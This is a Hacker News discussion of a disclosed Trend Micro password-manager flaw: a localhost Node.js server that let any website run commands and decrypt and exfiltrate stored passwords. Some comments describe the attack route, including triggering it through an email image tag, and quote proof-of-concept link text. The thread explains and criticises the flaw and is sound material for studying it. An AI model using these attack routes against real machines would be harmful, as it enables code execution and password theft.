Hacker News new | past | comments | ask | show | jobs | submit login
TrendMicro Node.js HTTP server listening on localhost can execute commands (code.google.com)
1030 points by tptacek on Jan 11, 2016 | hide | past | favorite | 229 comments



Props to Tavis for maintaining his composure in the face of this incompetence. Despite his mounting frustration, you can see he keeps repeating his request, "Turn it off, apologise for the disruption, and then get it audited before turning it on."

Even when they perform their half-solution, he still evaluates it on its merits, and then suggests how they can do better. A model of professionalism in the face of an absurd situation.


What an absolute clusterfuck. I work at a multinational company who's IT department (over my objection) installs Trend Micro on all user end points. I'll be sending this the department head's way, Trend might lose some business over this


Bonus points to Tavis Ormandy for this classy exploit code:

https://code.google.com/p/google-security-research/issues/at...

    <a href="javascript:begin()">Click Here</a> to run the command above 
    (the default will uninstall Trend Micro Maximum).


Wow I've only played with js a few days and I can interpret that pretty easily, so this seems pretty simple.


The JS is inconsequential, really. Just making the correct HTTP request, even by typing it in your browser, is the exploit.


Lol. Yes, funny how people love to throw JavaScript/Node.js into the mix.

It's like "They're using JS; how could it possibly be secure?!". That's actually highly ironic considering that JS is so far the only language that is secure enough to run universally in every browser on the planet.

People can't get around the fact that JS has evolved a LOT since it was launched and it still suffers a bad name.


You misunderstand why people think JS is insecure. The problem is that JS is really easy to make mistakes in because of silent errors, dynamic typing, type coercion, etc.

The result is that your server-side JS is more prone to different kinds of security issues.

On the client side, in the browser, JS is sandboxed, so the language is almost irrelevant. If JS can't actually access the underlying system, no number of bugs make the code insecure.


> The problem is that JS is really easy to make mistakes in because of silent errors, dynamic typing, type coercion, etc.

All those are not a factor in this instance. It seems to me it's a result of calling exec() on unscrubbed user input, and this can be done in any language.


I agree. I was responding to a tangential comment, rather than the root post.


Where here has JS been given a bad name? I didn't get that vibe.


One of those JS devs who gets really defensive when people are talking about JS and not screaming about how awesome it is.


Most of my experience saying you mostly do javascript in a room full of other coders is that they'll all scream at you to use a "better" language (on HN too).


Languages aren't inherently secure or insecure. In any case, nobody was accusing Node.js of being insecure here.

JS is not "the only language that is secure enough to run universally in every browser on the planet." In fact, JS has had many, many security issues in browsers.

Rather, JS is the only language nearly every browser on the planet has implemented in the browser (hopefully sandboxed!)


>Languages aren't inherently secure or insecure.

This is just not true.


Explain?


A language's specification can forbid you from doing things that you probably didn't intend to do. Rust is an entire language intended to be safer by design (as opposed to C, which is the cause of a lot of secure issues). You can write less safe code in Rust, but you have to tell the compiler that you're doing it on purpose.

It's also much, much easier to introduce bugs in certain languages because of the way they handle errors, or because the syntax is confusing and ambiguous. Even permissive handling of boolean logic, like what you get in PHP/JavaScript ("0" == true, for example) can result in massive security holes.


As another example, Go's := makes it much harder to do things you aren't intending to do.


Though it sounds like you're agreeing with me, that is not at all what I was saying.


Yes, I was just adding to your comment. Just pointing out that there is a pattern of people blaming JS even though it's not related at all to the problem. The same vulnerability would have existed regardless of whether the code was written in Python, Go, C, Erlang, Haskell, PHP or Scala... This is a logic error - Not something that a compiler would pick up.


In Haskell or Scala you could quite easily structure the code such that concatenating strings from different sources like that would be a compile error.


This is a massive design flaw, not a logic error. While I applaud the use of API's for modular design and communication, this is the wrong place for it.


This is clearly a terrible design flaw by Trend Micro. I hope some responsible are looking for new jobs.

Still, there isn't much faith I put in any endpoint security solutions. They are all terrible.

Bromium seems to be bucking the trend of traditional endpoint security but they have one of the worst sales / business dev programs I have ever seen. They should be much more ubiquitous than they are.


"I hope some responsible are looking for new jobs."

If they look for (and find) new jobs wouldn't that just mean the problem is diffused? Personally I would hope they learn from the experience of failing than to get punished for it.


Personally, I hope everyone else (not at Trend Micro) learns from this experience. Computer security auditing is a serious expertise, it's hard but made much harder to impossible when you don't have experts on the team and instead consider security expertise as a hobby for the qualifier.

trendmicro.com > About > "Smart, simple, security that fits"

And then second is, "a global leader in IT security" and "25 years of security expertise".

What a crock. I'm supposed to take the company's position statements and products seriously after reading this issue report? This is like finding a sponge in the body cavity of a patient. It's functionally malpractice. The CIO and CTO should be fired. The CEO probably should resign, what else is the purpose of a CEO other than to make sure the main things the company stands for are true, and actually ships products that demonstrate it stands for those things? If they don't resign the board needs to fire them.


I'd like to point out that it'd be an even bigger and redder red flag (if that's possible), should Trend Micro fire some team "security" developer, or even the product manager.

How is it possible, that a company which describes itself in the terms it has [1], have not done a thorough code review of all products before making them public? That is implicit in their own description of what their business does.

I'm not even sure the worst parts of this particular product's flaws would have escaped cursory code review by someone who is actually a security expert. And if that's true, then selling this product as it was before patching, might be fraud.

[1] http://www.trendmicro.com/cloud-content/us/pdfs/about/ds_cor...


That's a great sentiment, but sometimes we have to stick to more realistic hopes.


Those people who are responsible just received a significant education.

I don't think throwing coders or designers into a pit when they make big errors does anything helpful. Most likely, Trend has a cultural problem. Big errors like this can be an aide that spurs corrections.


The problem is that endpoint OSes are horribly insecure. It's hard to well nigh impossible to build a third party "endpoint security solution" for that, since this amounts to creating an aftermarket patch to plug a leaky dike.


There's a simple solution for that. Use a unikernel and make the entire OS immutable.

I'm really looking forward to the day where the tools are mature enough to make this an option.


I don't think it qualifies as a "simple solution" if it's not feasible with today's standards.


Simple != trivial.

A space elevator is simple. Building one is very much not trivial.

This is similar.


NodeOS is well on the way.

Packaging a server backend along with a minimal kernel and V8 VM isn't any more complicated than most of the build tools used today.

Here are the specifics: http://node-os.com/GitBlog/article.html#!200

When you cut 99% of the crap out of an OS, it becomes a lot easier to package/distribute.

Most of the work on NodeOS has to do with replacing POSIX with Javascript equivalents.

Immutable operating systems aren't a new idea either. How you think a Linux LiveCD works? ChromeOS is basically an immutable OS with an added persistence layer.

There's a lot more work to be done before any of the Unikernel implementations (ie NodeOS isn't the only one) are ready for production.

With that said, for webservers that aren't required to persist any state locally, it makes sense to remove mutability -- and there fore OS-level security vulnerabilities -- as a concern. That way, devs have more time/resources to focus on app-level security.



Fine for single-purpose app deployments, but on a grander scale you've just pushed all the security problems back to the APIs and interfaces of your cloud provider and/or virtualization engine. Now an AWS access token constitutes a root password for everything (for example).


Access tokens are a 'manageable' risk and AWS provides tools to enforce best practices where necessary.

Locating and regularly patching security vulnerabilities across thousands of components in a fully-featured monolithic operating system isn't. It's a potential disaster waiting to happen.

You don't need...

...a huge bundle of drivers when the OS will always run on a VM.

...extensive filesystem support when everything will be either transient or run directly from memory.

...multiple users when only one is required.

...OS-level sandboxing (ie kernel/user-space) when the VM already provides sandboxing.

...native POSIX tools when 'safe' alternatives can be run from the VM.

Despite the best intentions of developers and admins alike, the current approach to security is not working. Despite my own vigilance, I have personally had my sensitive information leaked by two separate multi-billion dollar organizations in the past year.

It's a simple fact that every feature added, increases the attack surface of the entire system. All I'm suggesting, is that it's not a bad idea to start looking to the alternatives that are becoming available.


Bingo. the PCs of old were more secure in that they did only one thing at once. These days even the most barebones install have all manner of things running in the background, and any normal user setup is likely to add a dozen more.


Pretty sure this only works on the personal version of their software. We don't even have an option to deploy a password manager (that I'm aware of) as part of the enterprise Anti-virus product.


Regardless, given what was discovered in the personal version, would you trust the enterprise version?


The personal versions are what get saddled with "Value Add-Ons" like password managers/website screening with colorful icons/blah blah bullshit bullshit. Most enterprise anti-virus software concentrates on finding viruses and maintaining compliance with whatever policies you have. They are also usually managed by different divisions with different goals.

(Whether or not anti-virus at all is effective is another debate entirely.)


I really do wonder how the market got segmented like this...


Confirmed, this does not work for `Trend Micro Worry Free Business Security` clients. I do know that the enterprise / business version installs a server on the management machine. I do not currently have access to the box that our version is hosted on to test the exploit there.


Really, it's a simple email away from a complete disaster

Send an email to several people on the organization containing the offending JS that calls shell execution, this can have a huge impact.

"Security software" LOL


While email can't directly call JavaScript, these URLs look like they'd work if just loaded, so an <img> tag might suffice to cause shell execution.


True, and you can always have a "Click here for more info" in the email pointing to a believable page.

But yeah, an image will most likely do it.


Check if your installation is vulnerable. My company uses TM Officescan for desktops and this doesn't work (I think this Password Manager is not even installed by I just tried the localhost url POC and it doesnt' work).


From the email thread:

> I happened to notice that the /api/showSB endpoint will spawn an ancient build of Chromium (version 41) with --disable-sandbox. To add insult to injury, they append "(Secure Browser)" to the UserAgent.

> I sent a mail saying "That is the most ridiculous thing I've ever seen".

This is indeed unbelievably ridiculous.


More ridiculous than that time Microsoft shipped an operating system with no firewall enabled by default and a feature designed to allow for remote commands to be executed?

I think the Blaster Worm and other variants that took advantage of that excellent decision were far worse.

https://en.wikipedia.org/wiki/Blaster_(computer_worm)

https://books.google.com/books?id=_TgEAAAAMBAJ&pg=PA60&lpg=P...


You can make a lot of things sounds comically insecure, very much including virtually all open source software, if you use 2003 as the benchmark.


Not really.

A FreeBSD 4.x system with a (modestly) stripped down kernel and running sshd was not only rock solid in 2003, but would probably be rock solid today.

Just to pick one random example.


Doesn't sound like a random example to me. It sounds like one of the most secure examples you could think of.


No, FreeBSD 4.x from 2003 would not be "rock solid" today; it had kernel RCEs. Not to mention the ones in OpenSSH.

Nothing was secure in 2003.


Hmm... I would have to look to be sure, but having lived through it all, I seem to remember that all of the 2-3 OpenSSH security advisories that came out for FreeBSD in the last 10-12 years were either:

a) incredibly far fetched theoretical attacks that didn't work in almost 99% of live deployments

b) local privilege escalation that required a real unix login on the system to exploit

I think if you had left a FreeBSD 4.x system running on the public Internet all of these years you would have been untouched.


I've been doing FreeBSD security in particular since 1996, when I got the commit bit for discovering the crt0 environment overflow flaw, and all I can say is that this just isn't true.

You don't even have to be a security specialist to know that there's something wrong with your argument, because you're talking about exactly the time period where OpenBSD --- which is more secure than FreeBSD --- comically started having to change its tagline from "no remote vulnerabilities in the default install" to "just one vulnerability in the default install" to "only two remote vulnerabilities in the default install for a heck of a long time".

Even OpenBSD concedes it wasn't secure in 2003!


Or that time the Trojans let the greeks send in a horse full of soldiers.


Your example is ridiculous; in this case Trend Micro took a a year old product missing several patches, turned off the single most important exploit mitigation in a modern browser, and slapped a sticker that said "Secure Browser" on it and shipped it. Versus you know, shipping an OS that doesn't contain features, more than a decade ago.


Yeah, it's more ridiculous because of they specifically naming it the "secure browser" API.


Having studied their Linux Antivirus (TrendMicro ServerProtect), it's far from a clean, safe and well maintained piece of software:

* It comes with its own http server (apache, with a conf file mentioning NCSA (!))

* Their realtime kernel module barely compiles (on quite old kernel versions), has a disgusting code and Makefile and makes the computer slow or simply crashes when it kind of works.

* They ship their Antivirus with quite old libraries, some compiled more than 10 years ago, and some probably impacted by several CVEs (openssl < 1.0.0, quite old libxml).

* Their init scripts are an ugly thing written in perl lauching several services in one script.

* Their rpm packages are just mindfucking. You have one rpm package to install the software, and other rpm packages to patch it... WTF.

From a piece of software, running as root (or even worst, in kernel space), written in C and analyzing untrusted inputs by definition, it's a bit worrying to say the least.


To be fair, I've never used a Linux antivirus suite that wasn't a complete piece of garbage. For instance, every single on-access scanner I've ever seen has been so broken and terrible that it gets disabled almost immediately because it impacts the system's ability to function reliably.

Makes me wonder why any of them bother, except for the piles of cash they can make off of unscrupulous rubes in management who demand AV software across the entire environment.


ClamAV is decent-ish compared to these. It's still written in C so sandbox heavily...


Why is a conf file mentioning NCSA so surprising? Mosaic has a lineage that can be traced to modern browsers like Edge, so it'd make sense to have conf items geared toward the NCSA family of browsers.


That'll be talking about NCSA HTTPd, the ancestor of Apache. Apache forked in 1995.

https://en.wikipedia.org/wiki/NCSA_HTTPd

Any Apache configuration file mentioning NCSA would be from the Apache 1.x lineage.


Apache is derived from NCSA HTTPd, having a config file with NCSA mentions is a sign of the age of the apache codebase being used or an extremely old default configuration file being used.


With regards to TrendMicro I still remember having to deal with an end user who had this installed and had the "internet security" feature enabled.

It intercepted the not-quite standard response header "Content-Encoding: ps-bzip2" to our windows client application, stripped off the header it didn't understand but, of course, didn't decompress the payload.

So our application has not seen a Content-Encoding header and thus tried to run with the presumed-non-compressed response - that went really well.

Since that day, our server uses a content-type header that contains the word bzip2 :(

The icing on the cake: The customer in question told me that their cousin is working at TrendMicro and that they are by far the best virus scanner out there and that this must clearly have been my fault.

I'm not surprised that they also get other stuff wrong.

However, I'm surprised at the level of incompetence shown here. This is a security product after all.


> It intercepted the not-quite standard response header "Content-Encoding: ps-bzip2" to our windows client application, stripped off the header it didn't understand but, of course, didn't decompress the payload.

I think this is actually a feature in many different products from different vendors. If I recall correctly, ISA Server (since 2004!) and the like inspect HTTP and SMTP traffic and validate it for conformance to published standards. If a malformed SMTP message comes in, it discards it. This prevents your mail server from being exposed to malformed messages, which could lead to denial-of-service/remote-code-execution/maybe it will be fine who knows.


The content encoding header is meant to be extensible. This is where chrome added sdch and now we're about to get brotli compression in Firefox and chrome. If that release of trendmicro was still in use, people wouldn't be able to visit Google with chrome nor any upcoming site with brotli support.

Also, if they didn't like my ps-bzip2 encoding, they could have also stripped it off the clients accept-encoding header, causing the server to not compress the response. But they left it there and just stripped off the content-encoding response header.


Headers are meant to be flexible in theory, but in reality it seems that anything outside the most common few are going to break things.

The series of blog posts linked below might interest you.

http://noxxi.de/research/http-evader-explained-2-deflate.htm...


> I think this is actually a feature in many different products from different vendors.

It is, but it sounds badly implemented as described here.

Stripping headers and sending on the rest of the message with no care for the content is bad design, you are essentially corrupting a request or response.

If there is a problem with a message discard or quarantine the whole thing and log the event (in the case of SMTP perhaps send the target a "we blocked this, check with the sender if you really need it" and/or the sender a bounce if you are reasonably sure the sources headers aren't faked) for future analysis.


What a shamble.

This thing with so called security products should be regulated somehow. These sort of exploits should carry a huge fine from the FTC or something of the sort as this, and many other "security" products (I'm looking at you AVG) is blatant deception, if not the exact opposite.


We should all demand 3rd-party audits of our security products.


I was really thinking the same thing. Just like electronic products have UL[1] certification, there needs to be a few labs that really look at how these products are architected and the data exposure is like. Then rate them accordingly.

[1] http://ul.com/


Imagine if there was some sort of government agency that did this as a service to protect its citizens. Some sort of National Security Agency, if you will... Oh wait, we already have that and they do the opposite. :|


And it’d be even something that politicians could realistically say!

> We need the Antivirus-TÜV now!


Not only security products, but all the core parts of our daily software stack.

I can imagine, in future, that an OS becomes like a nation. There's a core, transparent "government" component of the system which takes care of all low-level resource managements and security (just like a real life government) and there's a proprietary app which has a secret component but has to play by rule (just like a real private company). All the government behaviors and its legislators (i.e. maintainers) are constantly monitored by its users and media, and they are accountable for their actions.

Yes, this is far from perfect, and while we still might have the NSA of a kernel and the Enron of 3rd party apps (whatever it means), I'd argue this is better than the current everything-is-proprietary model.


I've been saying for years that unregulated information security will lead to an Enron-level disaster and eventually result in legislation similar to Sarbanes-Oxley. It's a shame it will take a huge disaster for this to happen.


The huge disasters have been happening, repeatedly, for years.

There are botnets in the millions running on supposedly "Norton-protected" PCs.

No one cares. It's not a problem the people in a position to do anything about even understand.


It's more likely to be Pearl Harbour than Enron if IoT ever becomes popular without improved security.

Having your server hacked is one thing. Making kitchen appliances burst into flames - which is not impossible with remote control - is something else entirely.

It's a national security issue. Imagine a state actor or a terrorist org deliberately launching a synchronised mass IoT attack against another country.

Imagine the attack is untraceable because it's routed through all the botnets out there.

It's great the NSA wants backdoors everywhere, because that will make attacks easier to trace - wont't it?


If we all demanded it now, it theoretically (TM) wouldn't require legislation.


So who are some legitimate auditors?


Proper penalties on contracts and/or established no-buy lists might be more effective. Push the balance between "boring product" and "useless features" a bit more towards the former.


and audits of the 3rd party auditors?


As a consultant for a company[1] that provide code auditing services, I welcome third-party scrutiny for the open source libraries[2] we produce.

[1] https://paragonie.com

[2] https://github.com/paragonie


I presume sarcasm. Interestingly, the auditors would be taking on the risk that they've done a bad job, so their auditors are the security experts who keep finding these security holes.


Yup. No, really.

We'll want to document the successes and failures of security software companies, their auditors, and their auditors.


Those responsible for auditing the auditors who have just been audited, have been audited.


Welcome to the "many eyes, shallow bugs" side of the world.


Which is why the linux kernel is such a pinnacle of security excellence. /s


This is so bad that Tavis Ormandy was "astonished" by it. That has to be saying something.


The title on HN understates the case at this point. It's not just remote code execution (more than bad enough, by itself). If you are foolish enough to trust Trend Micro, they install a password store, whence:

   Then you can use the decryptString API to decrypt all the strings, and then 
   POST them somewhere else.
    
   So this means, anyone on the internet can steal all of your passwords 
   completely silently, as well as execute arbitrary code with zero user 
   interaction. I really hope the gravity of this is clear to you, because I'm 
   astonished about this.

You can convince their shit product to POST ALL YOUR PASSWORDS to an arbitrary server.


This really is a horrific security flew. Hard to believe that software made specifically to protect users and their computers, opens up the floodgates and serves their passwords on a plate.

I wonder has much damage such a flaw has caused?


Where did you get the idea that this software is "made specifically to protect users and their computers"?


> Where did you get the idea that this software is "made specifically to protect users and their computers"?

Read the marketing copy for it.

http://www.trendmicro.com/us/home/products/software/password...

Note also

* that TM charges $15/year for any non-toy use of the software (that is, if you want to store more than four passwords)

* the language that describes the "Secure Browser" feature, which is really an ancient version of Chrome/Chromium that has sandboxing turned off.


OK ... let me spell it out for those who apparently can't figure it out by themselves:

"This is really a horrific medical safety problem. Hard to believe an oil that is made specifically to cure your ailments has non-foodsafe stuff in it!"

If the packaging of snake-oil tells you about its miraculous properties ... that is, believe it or not, not a reliable source of information.


I'm finding it harder and harder to understand why I should ever install software that hooks into my OS on multiple levels and opens holes to the outside world without any notification in the name of "security"


You shouldn't. Antivirus is a relic of the early 2000's.


Let me back this comment up with some reading material and useful resources:

http://decentsecurity.com/about/ (This entire website)

https://www.microsoft.com/emet (for Windows)

https://paragonie.com/blog/2015/06/guide-securing-your-busin... (basic web security advice for non-technical people)

You don't need AntiVirus.


I it is not that we don't need it but it is finally obvious that there is no reliable way to detect harmful software. All we are left with is putting each and every application in sandbox, unable to interact with any other software or user data. It is just very hard to make that user friendly and acceptable for average Joe.


This is basically my stance at this point.


Yeah, like condoms...


No, not like condoms. If STDs became blockable with common sense and condoms started shipping with perforations and prickles on the inside then yes, but that's not the case is it.


I think he was trying to draw an analogy between installing untrusted software, and getting intimate with untrusted people. Both are avoidable.

One obvious difference is that the consequences of mistakes can be higher for STDs then for infected computers, but that's the analogy.


Condoms also prevent pregnancy. This comparison is ridiculous.


The DOJ statute of limitations preventing AV from being an OS component has run out, so now, properly, AV is again a background OS component and the third parties are more and more proven to be snake oil salesmen.


How did no one within the company catch it? Aren't security products developed by at least somewhat security-minded people? Is it all just a sham?


No, security products are not typically developed by people who understand secure programming, even at companies that employ teams of people to do vulnerability research. The people who build security software are the same as the ones who build everything else.


I can confirm this is the case for my company. The software we produce can be classified as security software, yet nobody is trained in secure programming or even basic security principles (e.g. validate all input, defense in-depth, etc). I'm by far the most security-minded developer on a team of about 20 developers, but everything I know is because I'm interested in the realm of security.


Companies that produce "security products" don't give a damn about secure development. They do give a damn about infographics and sales presentations citing "sexy-sounding" research projects.


> They do give a damn about infographics and sales presentations citing "sexy-sounding" research projects

Sort of like the startup community?


Not too different. Most antivirus is based on a flawed premise, and most hackers know this.

http://www.sevagas.com/IMG/pdf/BypassAVDynamics.pdf


I don't mean secure programming, just people who would poke their product a little over lunch.


> Is it all just a sham?

Yes, unless you are so computer illiterate as to regularly download old viruses by accident.

> How did no one within the company catch it?

I doubt they do any reviews of their code beyond QA/"Does it work?"

> Aren't security products developed by at least somewhat security-minded people?

No. Pretty much the people who test for vulnerabilities [i.e. actual security-focused programmers] are more expensive than the average Windows desktop programmer.

Now just imagine what companies that process your credit cards look like...


>Is it all just a sham?

Yes. There's hardly anything* local to a client worth paying money for that will make you more secure.

*--> hedging for a miraculous product I just don't know about


Where did you get the idea that antivirus software is a security product?


Just another reminder that antivirus is dead. Any antivirus can be trivially circumvented. Based on the level of incompetence of multiple antivirus developers over the past few years, and my own experience with antivirus slowing down and heating up my machine, antiviruses themselves are more trojans than anything.


GPO with AppLocker (app whitelisting) seems to be a good solution for Windows, kind of a pain to setup though.


While that seems like a somewhat sensible approach for non-technical end users (modulo various kinds of runnable scripts), a whitelisting approach can't possibly work in an organization doing software development.

I can't think of any technological approach that would work in such an organization, short of completely redesigning end-user client systems.


If I was to use antivirus it would have to be whitelisting. Everything else is a toy in my opinion.


> They are already in discussion with stakeholders regarding the emergency deployment of this fix.

You know a company is managed ineffectively when you can't even deploy security patches without talking to stakeholders. In any reasonably-managed company, stakeholders would only be involved with the press release announcing the issue (if at all).


That's not what this means at all. In any given company there are X individuals across Y teams involved in deploying a piece of software (never mind an emergency patch). Stakeholders in this context refers to all those involved to make it happen: devs, QA, PMs, documentation, marketing, etc.

The problem isn't solved as soon as a patch is released. This is serious damage control. Handled poorly it blows up. A lone dev doesn't/shouldn't hold all that responsibility.


I would hope "stakeholders" is in reference to Project Stakeholders (i.e. Project Managers) and not stakeholders in the company (which would be absurd).


I think you've confused "stakeholders" with "shareholders".


This is true. The only time I ever had to talk to my CEO about a security patch was, "Sorry, this bug is kind of urgent and the fix needs to be deployed before tonight. Bring be back some orange chicken?"


Stakeholders != CEO. It can be, but it's hardly the only option.


We don't have puppeteers, so, it's the only approximation I could muster from my experience.


I don't understand this thread at all.

Where I live, "stakeholders" just means the people responsible for or affected by something. Being "in discussion with stakeholders" about a fix just means talking to everyone involved in getting it deployed.

Is this term used with other meanings?


I misread it as "shareholders" to be honest.


I think I was confused with shareholders vs stakeholders.


This is so blatantly incompetent that I can only imagine the situation being a result of corporate dance.

While there are many oblivious developers, I highly doubt that incompetence was the root cause. I'd point to a lovely mix of a) deadlines; b) slow internal procedures to approve the usage of third-party libraries; and c) requirements being passed to developers without context. It's hell, what corporate environments can push us to do. I'd bet that most of the people who worked in big corps have their own stories about internal procedures making them do things they objectively knew were wrong.


Well this is scary. How am I to trust a password manager if something as obvious as this is allowed to be shipped to the end user?


Most password managers are heavily audited. Likely why the Trent Macro one wasn't is because nobody with any technical sense is installing their nonsense to begin with.

But LastPass, Keypass, Chrome's password manager, Firefox's manager, and IE are audited all the time, with tons of exposé articles supposedly trying to inform us about how weak they are (but all these articles do is further clarity how strong they are, since they only find trivial issues, or they misunderstand a feature as a bug).

I cannot recall the last time any of these had what I would consider a REAL security bug.


Most password managers are not heavily audited. Random third parties look at them and occasionally find things, but that's not the same thing as the development team bringing an auditing team in and giving them access to all the source repositories and documentation.


Chrome and firefox both store saved passwords in plain-text in easily accessible local databases. Don't rely on them to keep passwords safe. I have no experience with IE's password locker.


> Chrome and firefox both store saved passwords in plain-text in easily accessible local databases.

All password managers store plain text passwords. That's literally a requirement for them to work at all.

Chrome encrypts the password in the SQLite database[0] using Windows' CryptProtectData() API, and Firefox encrypts the passwords either using your master password, or if none is set then it encrypts but stores the encryption key in the key3.db.

> Don't rely on them to keep passwords safe.

You've presented no justification for that. If you're using a root compromised machine then no password manager is safe. If your machine is secure then your passwords are secure in both Chrome and Firefox, but more secure in Chrome.

[0] http://www.howtogeek.com/70146/how-secure-are-your-saved-chr...


All password managers store plain text passwords. That's literally a requirement for them to work at all.

I'm not sure this is what you mean to say, because, obviously, good password managers don't store passwords in cleartext.


You cannot hash passwords in a password manager. It has to be reversibly encrypted and turned back into plain text before utilisation.

So when people complain about password managers storing plain text (as opposed to hashing) they're barking up the wrong tree, it is a necessary evil.

You just want to see them encrypt those plain text passwords so that offline recovery is harder. That's what both Firefox's master password, CryptProtectData() for Chrome/IE, and the key-chain in OS X provide.


I think you're trying to say something akin to but not quite "plaintext equivalent", and your terminology is mangling your argument.


Ah come on, you obviously understand what he is trying to say. You don't always have to interpret every comment online as if the person writing them is stupid.


> All password managers store plain text passwords. That's literally a requirement for them to work at all.

> Chrome encrypts the password in the SQLite database[0] using Windows' CryptProtectData() API

If its encrypted, then its not plaintext. Its ciphertext. In infosec lingo plaintext specifically refers to the unencrypted and otherwise unaltered original information.


Seeing as the parent comment was in reply to an assertion that Chrome stores plaintext passwords, I think it was assumed that the assertion intended to mean "Chrome has access to your plaintext passwords", otherwise the reply would simply have been "No, you're wrong".


Firefox will encrypt your saved passwords if you set a master password on the Security Preferences panel. Really should do so by default, but at least it's available as an option.


This is simply untrue.


ON WINDOWS.

A couple of years ago, chrome joined safari in using the OSX KeyChain. (On Ubuntu, Chrome can also use the gnome-keyring)


>How am I to trust a password manager if something as obvious as this is allowed to be shipped to the end user?

You don't. Assume every online service you use subject to security holes. What defines a secure app from an unsecure one is revealed after a security incident. That's why I continue to use LastPass simply because they exemplified their security practices during their recent scare.


Have a look at this solution, a shell wrapper around GPG for managing passwords - https://github.com/drduh/pwd.sh


> To be clear, you can get arbitrary code execution whether they're using it or not, but stealing all the passwords from a password manager remotely doesn't happen very often, so I wanted to document that.

Best part.


This recent one in regards to an AVG Chrome extension is slightly "less-worse" than this TrendMicro issue: https://code.google.com/p/google-security-research/issues/de...


http://www.trendmicro.com/us/about-us/index.html Smart, simple, security that fits

As a global leader in IT security, Trend Micro develops innovative security solutions that make the world safe for businesses and consumers to exchange digital information. With over 25 years of security expertise, we’re recognized as the market leader in server security, cloud security, and small business content security. Trend Micro Inc. is a global security software company ....


> TrendMicro helpfully adds a self-signed https certificate for localhost to the trust store, so you don't need to click through any security errors.

Anyone know if this uses a non-unique key pair like the Lenovo one did?


I don't think it really matters, as long as it's only a certificate for localhost rather than a root CA as in the Lenovo case. I can't think of an attack scenario where an attacker already able to run an HTTP server on localhost would be aided by being able to use HTTPS on that server. Of course, I could be missing something.


I can't even begin to describe my loathing for antivirus products. I haven't used one personally in years, but there is a real quandary for a few of my colleagues--they are not very technically inclined. This ranges in consequence from needing help with simple tasks to having absolutely zero instinct/ability to recognize phishing or questionable emails and links. I usually end up putting something on their machines to help but often feel like it's a lost cause.


I'm presuming Windows because "not very technically inclined" but at this point when I help such people it's mostly a matter of A) verifying UAC is active and at or higher than the default [1], B) verifying Windows Defender and Smart Screen are active and up to date (Windows Update).

In every case I've seen of Windows Defender or Smart Screen being disabled or out of date it almost always seems to be the fault of a "security product" the user was talked into buying (especially the Norton Insecurity Suite). Defender and Smart Screen together silently but capably do their job at handling the main issues for a not very technically inclined person's systems and I find the harder issue is convincing them not to install games from disreputable sources (random poker websites, the weird shadows of once sort of reputable places like RealArcade and WildTangent) that install irritating adware and occasionally spyware, short of "taking away the UAC keys" and forcing them to call me to type in an admin password to install software for them, which I don't have the time/inclination to do.

[1] If a not very technically inclined user complains they see too many UAC prompts they are probably doing something wrong and you should help them figure that out.


Windows Defender on Windows 10 works fine. You'd be crazy to either disable it and/or install a different security product.


It's absurdities all the way down!

My favorite part is that they use the address pwm.trendmicro.com. (I had to finger peck that now, my muscle memory kept typing something much more fitting.)


Is there a US-CERT advisory for this yet?

Why are those APIs even there? A "retrieve all passwords in the clear" API? A "run browser insecurely" API?

Has anyone considered charging Trend Micro with reckless endangerment or material support of terrorism?


On the bright side, they reacted relatively quickly for such a large company, and fixed the vulnerability.

Whoever is in charge of security for that project must be pretty embarrassed (or the person doesn't exist)... Also no audit? cmoooon.


Is there any reasonable reason why anti-virus vendors often include shady or insecure software like this? It honestly the worst case of security theater where it looks like its helping but is honestly doing the opposite. And I really wish AVs didn't try to include extras, as this really lowers my disposition against the (scammy) Anti-Virus market. And this isn't the first time that an AV turned out to make the computer less secure.

I have Avira Free installed, But only have the AV part and have disabled Web/Mail Protection. So I am hoping that Avira are trustworthy enough and don't push anything my way.


Of course, it's not the first time. As a matter of principle, antivirus software cannot work. The whole idea is a scam. So, how is it surprising that they bundle other equally useless/scammy software?


Wow. Feel kinda bad for the TrendMicro team. This has to be rather embarrassing.


No I do not feel bad for them at all. More often we see that Antivirus products are total scams. The people behind it are basically criminal. They install rogue certificates, are full of exploitable vectors, share our data with third parties, inject ads in our browser traffic and are just horrible and slow our computers down. From a security perspective, installing an AV actually sounds like a really bad idea these days. They're basically really horrible viruses in disguise. The most horrible kind of virus. These people need to be shamed and I wish these companies nothing but the worst.


The worst thing is that they exploit peoples' fears. You'll get eaten by the big scary virus monster and lose everything, unless you install our helpful software for just $99.95! Your average mom and pop computer user has no idea whether it's really needed or not.


I still sympathize with a subset of the ICs, those that must see so many problems (maybe even futilely trying to fix them) but being crippled from doing much by internal dynamics. I wish them the courage to pack up and leave for someplace better, while on those who have been responsible long-term I agree with you.


They're grossly incompetent. You don't feel bad for people who are grossly incompetent, you feel bad for the victims of their incompetence.


Windows defender is the only av I trust to not totally duck up my pc.


It's pretty much ineffectual though, as Microsoft themselves admitted some time ago.

It consistently scored lower than most other products in detections/heuristics.

The only thing it has going for it is the light foot print.


I think the other might be that it doesn't have glaring, obvious holes like Trend Micro.


Can someone ELI5 why TrendMicro would do this? Sincerely--I don't know what they get out of it, unless they're bad guys. Not trying to be snarky here.


This seems like a textbook case of Hanlon's Razor (https://en.wikipedia.org/wiki/Hanlon's_razor, "Never attribute to malice that which is adequately explained by stupidity"). They wanted some way for their website to interact with the user's local installation of their software, and somehow arrived at the idea of running a web server on localhost and accessing it from their website, without thinking through the security implications at all. Even their responses in this bug show that they still don't really understand the implications.

Less broken software tends to solve this same problem using a browser extension with a whitelisted domain for access, but that has the disadvantage of requiring a browser extension for each browser, and doesn't fully protect against hostile networks. Including the "https://" in the whitelist would provide somewhat more security, especially with HSTS, a pinned certificate, and a carefully-audited single-purpose domain.

But an even better design would eliminate the entire concept of connecting back from the vendor website to the client software. Sometimes the right answer to "how do I" is "don't".


Thanks for the explanation, and...

    Sometimes the right answer to "how do I" is "don't".
Beautifully put.


Some programmer on a project sees a lot of code that's calling out to various Windows functions and thinks, "You know, it'd be a clean refactor if I just merge all these into a single abstract route on the server that could call any Windows function."


Okay so piecing this together, let me know if I am correct. The TrendMicro password manager will utilize a ShellExecute command to open a URL defined in a query string? I feel like not trusting/passing $_GET/REQUEST params was one of the first things that I learned when doing PHP development 12 years ago. Is this a concept that needs revisiting with new-age Node developers?


The problem wasn't that they were trusting GET params it's that they forgot that they weren't the only ones capable of sending requests. If you wrote a website that could old be accessed by people/computers you trust then trusting the parameters is no problem.

TL;DR It's not how the data is sent but where it came from.


Oh okay, the expectation was that the web server that the application run was to be private to the application and not anything else. I wasn't aware that apps ran their own web servers, how often is that done?


Obviously at least once too often. :)


